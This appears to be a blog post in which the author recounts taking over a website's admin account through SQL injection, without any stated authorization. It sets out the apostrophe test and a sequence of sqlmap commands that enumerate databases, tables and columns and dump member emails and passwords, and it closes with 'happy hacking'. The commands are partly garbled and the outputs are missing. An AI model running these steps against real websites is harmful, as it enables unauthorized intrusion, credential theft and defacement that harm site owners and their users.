How I gained admin level access to a website?
It’s been some time since I tried gaining admin level access for any website. Today after a few days of chilling around and watching t.v. series I thought it was time to get back into the groove.
To gain admin level of access for any website the only way is to carry out a phishing attack, a key-logger attack or maybe a SQL attack. So, I tried to carry out a SQL injection attack on a website to obtain total admin access and boy was I successful?
Let’s dig in!
I started my attack on the website example.com/list.php?id=1, as it has the id parameter chances are it was more prone to SQL injection attacks. To check whether the website was vulnerable to SQL attack or not, I replaced the number “1” in the parameter and inserted an apostrophe “ ‘ ” in its place. A particular error was displayed when the website completed loading.
Now as soon as I got this error back from the server I knew there was a high chance that the server was vulnerable to SQL attacks. So, I opened up sqlmap to carry out the SQL attack.
The attack begins!
So, I started to check if the SQL vulnerability is exploitable or not using sqlmap and went ahead and launched the attack
sqlmap -u http://example.com/list.php?artist=1- -no-cast - -dbms=mysql - - dbs
And I was presented with the following output.
As soon as I got the above message I knew I had hit the jackpot. I proceeded ahead with my hack where I tried to get the information out of the first database.
sqlmap -u http://example.com/list.php?artist=1- -no-cast - -dbms=mysql -D da******ak - -tables
And I was presented with the following outputs.
Now in the first look I didn’t see anything interesting as most of the stuff was available on the website anyways. Then my eyes went on the table column “member”. I went ahead with the attack to figure out the detail of the columns inside the member table.
sqlmap -u http://example.com/list.php?artist=1- -no-cast — -dbms=mysql -D da******ak - -T member - -columns
And I got the following output.
Then I went ahead to find out the details that was presented inside the member table.
sqlmap -u http://example.com/list.php?artist=1- -no-cast - -dbms=mysql -D da******ak -T member -C member_email, member_fullname, member_password, member_user - -dump
As soon as I entered the above command I got the following details of the admin account which later on provided with control of the entire website and its contents.
SQL injection is a very dangerous attack that if carried out on a website can be extremely dangerous as it gives admin level access to the attacker. This allows the hacker to manipulate the contents of the website enabling to deface the website or using it for phishing purposes or even enable different scripts on the website according to hid needs.
If you enjoyed it please do clap and happy hacking!
Twitter : twitter.com/aditya12anand
LinkedIn : linkedin.com/in/aditya12anand/
E-mail : [email protected]